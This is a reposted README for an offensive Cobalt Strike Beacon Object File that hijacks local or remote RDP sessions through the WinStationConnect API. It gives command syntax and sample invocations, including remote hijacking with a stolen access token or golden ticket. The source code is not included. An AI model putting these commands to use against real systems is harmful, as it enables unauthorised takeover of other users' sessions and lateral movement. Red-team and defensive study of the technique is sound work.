RDPHijack-BOF - Cobalt Strike Beacon Object File (BOF) That Uses WinStationConnect API To Perform Local/Remote RDP Session Hijacking


Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking. With a valid access token / kerberos ticket (e.g., golden ticket) of the session owner, you will be able to hijack the session remotely without dropping any beacon/tool on the target server.

To enumerate sessions locally/remotely, you could use Quser-BOF.


Usage

Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]Command         Description--------        -----------password        Specifies the password of the user who owns the session to which you want to connect.server          Specifies the remote server that you want to perform RDP hijacking.Sample usage--------Redirect session 2 to session 1 (require SYSTEM privilege):bof-rdphijack 1 2Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon):bof-rdphijack 1 2 password [email protected]Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2):bof-rdphijack 1 2 server SQL01.lab.internal

Compile

make

Reference

tscon.exe




Source: www.kitploit.com
RDPHijack-BOF - Cobalt Strike Beacon Object File (BOF) That Uses WinStationConnect API To Perform Local/Remote RDP Session Hijacking RDPHijack-BOF - Cobalt Strike Beacon Object File (BOF) That Uses WinStationConnect API To Perform Local/Remote RDP Session Hijacking Reviewed by Zion3R on 4:29 AM Rating: 5